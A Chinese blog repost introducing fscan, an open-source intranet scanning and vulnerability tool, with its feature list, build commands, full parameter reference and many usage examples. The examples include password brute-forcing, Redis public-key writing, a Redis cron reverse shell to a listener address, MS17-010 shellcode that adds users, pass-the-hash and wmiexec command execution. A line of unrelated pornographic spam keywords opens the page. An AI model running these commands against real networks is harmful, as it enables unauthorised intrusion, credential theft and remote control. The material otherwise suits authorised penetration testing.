国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

2年前作者:玩IT的川分類:Toy博客閱讀(30)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

今天給大家分享一個(gè)開源的內(nèi)網(wǎng)掃描工具,在GitHub平臺(tái)上面有5.3K Star。具體情況如下:

簡介

fscan是一款 go語言編寫的內(nèi)網(wǎng)綜合掃描工具,方便「一鍵自動(dòng)化、全方位漏掃掃描」。可以讓你快速的掃描出內(nèi)網(wǎng)網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu)支持主機(jī)存活探測(cè)、端口掃描、常見服務(wù)的爆破、ms17010、redis 批量寫公鑰、計(jì)劃任務(wù)反彈 shell、讀取 win 網(wǎng)卡信息、web 指紋識(shí)別、web 漏洞掃描、netbios 探測(cè)、域控識(shí)別等功能。

主要功能

1.信息搜集:

存活探測(cè)(icmp)

端口掃描2.爆破功能:

各類服務(wù)爆破(ssh、smb、rdp 等)

數(shù)據(jù)庫密碼爆破(mysql、mssql、redis、psql、oracle 等)3.系統(tǒng)信息、漏洞掃描:

netbios 探測(cè)、域控識(shí)別

獲取目標(biāo)網(wǎng)卡信息

高危漏洞掃描(ms17010 等)4.Web 探測(cè)功能:

webtitle 探測(cè)

web 指紋識(shí)別(常見 cms、oa 框架等)

web 漏洞掃描(weblogic、st2 等,支持 xray 的 poc)5.漏洞利用:

redis 寫公鑰或?qū)懹?jì)劃任務(wù)

ssh 命令執(zhí)行

ms17017 利用(植入 shellcode),如添加用戶等6.其他功能:

文件保存

簡單用法

fscan.exe-h192.168.1.1/24(全功能、ms17010、讀取網(wǎng)卡信息)fscan.exe-h192.168.1.1/16(B段掃描)

其他用法

fscan.exe-h192.168.1.1/24-np-no-nopoc(跳過存活檢測(cè)、不保存文件、跳過webpoc掃描)fscan.exe-h192.168.1.1/24-rfid_rsa.pub(redis寫公鑰)fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis計(jì)劃任務(wù)反彈shell)fscan.exe-h192.168.1.1/24-c"whoami;id"(ssh爆破成功后,命令執(zhí)行)fscan.exe-h192.168.1.1/24-mssh-p2222(指定模塊ssh和端口)fscan.exe-h192.168.1.1/24-pwdfpwd.txt-userfusers.txt(加載指定文件的用戶名、密碼來進(jìn)行爆破)fscan.exe-h192.168.1.1/24-o/tmp/1.txt(指定掃描結(jié)果保存路徑,默認(rèn)保存在當(dāng)前路徑)fscan.exe-h192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看網(wǎng)段信息)fscan.exe-h192.168.1.1/24-msmb-pwdpassword(smb密碼碰撞)fscan.exe-h192.168.1.1/24-mms17010(指定模塊)fscan.exe-hfip.txt(以文件導(dǎo)入)fscan.exe-h192.168.x.x-p80-proxyhttp://127.0.0.1:8080一鍵支持xray的pocfscan.exe-uhttp://baidu.com-proxy8080(掃描單個(gè)url,并設(shè)置http代理http://127.0.0.1:8080)fscan.exe-h192.168.1.1/24-nobr-nopoc(不進(jìn)行爆破,不掃Webpoc,以減少流量)fscan.exe-h192.168.1.1/24-pa3389(在原基礎(chǔ)上,加入3389->rdp掃描)fscan.exe-h192.168.1.1/24-socks5127.0.0.1:1080(只支持簡單tcp功能的代理,部分功能的庫不支持設(shè)置代理)fscan.exe-h192.168.1.1/24-mms17010-scadd(內(nèi)置添加用戶等功能,只適用于備選工具,更推薦其他ms17010的專項(xiàng)利用工具)fscan.exe-h192.168.1.1/24-msmb2-useradmin-hashxxxxx(pthhash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)fscan.exe-h192.168.1.1/24-mwmiexec-useradmin-pwdpassword-cxxxxx(wmiexec無回顯命令執(zhí)行)fscan.exe-h192.168.x.x/24-mnetbios(-mnetbios時(shí),才會(huì)顯示完整的netbios信息)fscan.exe-h192.0.0.0/8-micmp(探測(cè)每個(gè)C段的網(wǎng)關(guān)和數(shù)個(gè)隨機(jī)IP,并統(tǒng)計(jì)top10B、C段存活數(shù)量)

編譯命令

go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (可選,壓縮體積) #upx用于二進(jìn)制文件大小瘦身用的

完整參數(shù)參考

  -c string
        ssh命令執(zhí)行
  -cookie string
        設(shè)置cookie
  -debug int
        多久沒響應(yīng),就打印當(dāng)前進(jìn)度(default60)
  -domain string
        smb爆破模塊時(shí),設(shè)置域名
  -h string
        目標(biāo)ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        讀取文件中的目標(biāo)
  -hn string
        掃描時(shí),要跳過的ip: -hn 192.168.1.1/24
  -m string
        設(shè)置掃描模式: -m ssh (default"all")
  -no
        掃描結(jié)果不保存到文件中
  -nobr
        跳過sql、ftp、ssh等的密碼爆破 ["安全"]  -nopoc 跳過web poc掃描
  -np
        跳過存活探測(cè)
  -num int
        web poc 發(fā)包速率  (default20)
  -o string
        掃描結(jié)果保存到哪 (default"result.txt")
  -p string
        設(shè)置掃描的端口: 22 | 1-65535 | 22,80,3306 (default"21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
  -pa string
        新增需要掃描的端口,-pa 3389 (會(huì)在原有端口列表基礎(chǔ)上,新增該端口)
  -path string
        fcgi、smb romote file path
  -ping
        使用ping代替icmp進(jìn)行存活探測(cè)
  -pn string
        掃描時(shí)要跳過的端口,as: -pn 445
  -pocname string
        指定web poc的模糊名字, -pocname weblogic
  -proxy string
        設(shè)置代理, -proxy http://127.0.0.1:8080
  -user string
        指定爆破時(shí)的用戶名
  -userf string
        指定爆破時(shí)的用戶名文件
  -pwd string
        指定爆破時(shí)的密碼
  -pwdf string
        指定爆破時(shí)的密碼文件
  -rf string
        指定redis寫公鑰用模塊的文件 (as: -rf id_rsa.pub)
  -rs string
        redis計(jì)劃任務(wù)反彈shell的ip端口 (as: -rs 192.168.1.1:6666)
  -silent
        靜默掃描,適合cs掃描時(shí)不回顯
  -sshkey string
        ssh連接時(shí),指定ssh私鑰
  -t int
        掃描線程 (default600)
  -time int
        端口掃描超時(shí)時(shí)間 (default3)
  -u string
        指定Url掃描
  -uf string
        指定Url文件掃描
  -wt int
        web訪問超時(shí)時(shí)間 (default5)
  -pocpath string
        指定poc路徑
  -usera string
        在原有用戶字典基礎(chǔ)上,新增新用戶
  -pwda string
        在原有密碼字典基礎(chǔ)上,增加新密碼
  -socks5
        指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)
  -sc
        指定ms17010利用模塊shellcode,內(nèi)置添加用戶等功能 (as: -sc add) ["安全"]

部分使用截圖

fscan.exe-h 192.168.x.x  (全功能、ms17010、讀取網(wǎng)卡信息)
全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 寫公鑰)

全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一鍵支持xray的poc

全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

fscan.exe -h 192.168.x.x -p 139 (netbios探測(cè)、域控識(shí)別,下圖的[+]DC代表域控)文章來源地址http://www.zghlxwxcb.cn/news/detail-488029.html

全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan

到了這里,關(guān)于全自動(dòng)化、全方位內(nèi)網(wǎng)綜合掃描、漏洞掃描開源工具 Fscan的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • kafka知識(shí)點(diǎn)全方位講解

    kafka知識(shí)點(diǎn)全方位講解

    Apache Kafka是一個(gè)開源消息系統(tǒng),由Scala寫成。是由Apache軟件基金會(huì)開發(fā)的一個(gè)開源消息系統(tǒng)項(xiàng)目。 Kafka最初是由LinkedIn開發(fā),并于2011年初開源。2012年10月從Apache Incubator畢業(yè)。該項(xiàng)目的目標(biāo)是為處理實(shí)時(shí)數(shù)據(jù)提供一個(gè)統(tǒng)一、高通量、低等待的平臺(tái)。 Kafka是一個(gè)分布式消息隊(duì)列:

    2023年04月25日
    瀏覽(25)
  • 精彩解讀:短鏈接應(yīng)用全方位探究

    精彩解讀:短鏈接應(yīng)用全方位探究

    1. 短鏈接的定義和原理 短鏈接是一種將長網(wǎng)址轉(zhuǎn)換為短網(wǎng)址的服務(wù),通過簡化網(wǎng)址長度,方便用戶分享和傳播鏈接。短鏈接服務(wù)通過將長網(wǎng)址映射到短標(biāo)識(shí)符的方式,實(shí)現(xiàn)對(duì)原始網(wǎng)址的壓縮和簡化。用戶在訪問短鏈接時(shí),系統(tǒng)會(huì)將短鏈接還原為原始長網(wǎng)址,實(shí)現(xiàn)跳轉(zhuǎn)到目標(biāo)網(wǎng)

    2024年04月08日
    瀏覽(27)

  • SQL全方位攻略:3.SQL標(biāo)準(zhǔn)

    1.數(shù)據(jù)庫介紹 2.SQL介紹 【免責(zé)聲明】文章僅供學(xué)習(xí)交流,觀點(diǎn)代表個(gè)人,與任何公司無關(guān)。 編輯|SQL和數(shù)據(jù)庫技術(shù)(ID:SQLplusDB) 為了確保不同廠商數(shù)據(jù)庫系統(tǒng)之間的兼容性和互操作性,用于控制SQL查詢的行為和數(shù)據(jù)存儲(chǔ)結(jié)構(gòu)等方面的統(tǒng)一性,由國際組織或者國家標(biāo)準(zhǔn)化組織制定

    2024年02月05日
    瀏覽(19)
  • ?前端進(jìn)階:SEO 全方位解決方案

    ?前端進(jìn)階:SEO 全方位解決方案

    SEO 代表搜尋引擎最佳化/搜尋引擎優(yōu)化(英文全名Search Engine Optimization,簡稱SEO),是指通過了解搜尋引擎的自然排名的算法邏輯,以提高目標(biāo)網(wǎng)站在有關(guān)搜尋引擎內(nèi)排名的方式。 網(wǎng)站的 SEO 至關(guān)重要,它可以讓你的網(wǎng)站獲得更好的排名和流量,從而提高網(wǎng)站知名度。對(duì)于一些盈

    2024年02月09日
    瀏覽(18)
  • 全方位了解VR全景展示與制作

    全方位了解VR全景展示與制作

    引言: 虛擬現(xiàn)實(shí)(VR)技術(shù)正在以驚人的速度改變我們的生活方式和體驗(yàn)方式。其中,VR全景展示與制作作為虛擬現(xiàn)實(shí)的重要應(yīng)用之一,為用戶提供了身臨其境的視聽體驗(yàn)。 ?一、了解VR全景展示與制作 1.VR全景展示 VR全景展示是一種通過虛擬現(xiàn)實(shí)技術(shù),將用戶帶入真實(shí)或虛構(gòu)

    2024年02月13日
    瀏覽(26)

  • Android Jetpack組件的全方位分析

    Jetpack是一個(gè)用于簡化Android應(yīng)用程序開發(fā)的工具包,包含了一系列的組件和工具。Jetpack包含了很多組件,如LiveData、ViewModel、Room、Data Binding、Navigation等。 Jetpack組件是一種更高級(jí)別的抽象,它們可以提供更簡潔、更易于使用的API。支持庫是Jetpack組件的底層實(shí)現(xiàn)。 基本概念和

    2024年02月11日
    瀏覽(22)
  • 全方位對(duì)比 Postgres 和 MySQL(2023 版)

    全方位對(duì)比 Postgres 和 MySQL(2023 版)

    根據(jù) 2023 年的 Stack Overflow 調(diào)研 (https://survey.stackoverflow.co/2023/) ,Postgres 已經(jīng)取代 MySQL 成為最受敬仰和渴望 (the most admired, desired) 的數(shù)據(jù)庫。 ? ? 隨著 Postgres 的發(fā)展勢(shì)頭愈發(fā)強(qiáng)勁,在 Postgres 和 MySQL 之間做選擇變得更難了。 ? 如果看安裝數(shù)量,MySQL 可能仍是全球最大的開源數(shù)

    2024年02月13日
    瀏覽(28)
  • 【全方位解析】如何寫好技術(shù)文章

    【全方位解析】如何寫好技術(shù)文章

    前言 為何而寫 技術(shù)成長 :相對(duì)于龐大的計(jì)算機(jī)領(lǐng)域的知識(shí)體系,人的記憶還是太有限了,而且隨著年齡的增大,記憶同樣也會(huì)逐漸衰退,正如俗話所說“好記性不如爛筆頭”。并且在分享博客的過程中,我們也可以和大神交流,進(jìn)而發(fā)現(xiàn)自己的認(rèn)知錯(cuò)誤,糾正知識(shí)體系。最

    2024年02月16日
    瀏覽(28)
  • 全方位對(duì)比 Postgres 和 MongoDB (2023 版)

    全方位對(duì)比 Postgres 和 MongoDB (2023 版)

    本文為「數(shù)據(jù)庫全方位對(duì)比系列」第二篇,該系列的首部作品為「全方位對(duì)比 Postgres 和 MySQL (2023 版)」 根據(jù) 2023 年 Stack Overflow 調(diào)研,Postgres 已經(jīng)成為最受歡迎和渴望的數(shù)據(jù)庫了。 MongoDB 曾連續(xù) 4 年 (2017 - 2020) 蟬聯(lián)此頭銜。根據(jù) DB-Engines 排名,Postgres 和 MongoDB 都是排名前 5 的

    2024年02月15日
    瀏覽(62)
  • 如何對(duì) Spark 進(jìn)行全方位性能調(diào)優(yōu)?

    如何對(duì) Spark 進(jìn)行全方位性能調(diào)優(yōu)?

    日志收集 如果作業(yè)執(zhí)行報(bào)錯(cuò)或者速度異常,通常需要查看 Spark 作業(yè)日志,Spark 日志通常是排錯(cuò)的唯一根據(jù),更是作業(yè)調(diào)優(yōu)的好幫手。查看日志的時(shí)候,需要注意的是 Spark 作業(yè)是一個(gè)分布式執(zhí)行的過程,所以日志也是分布式的,聯(lián)想到 Spark 的架構(gòu),Spark 的日志也分為兩個(gè)級(jí)別

    2024年02月21日
    瀏覽(32)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包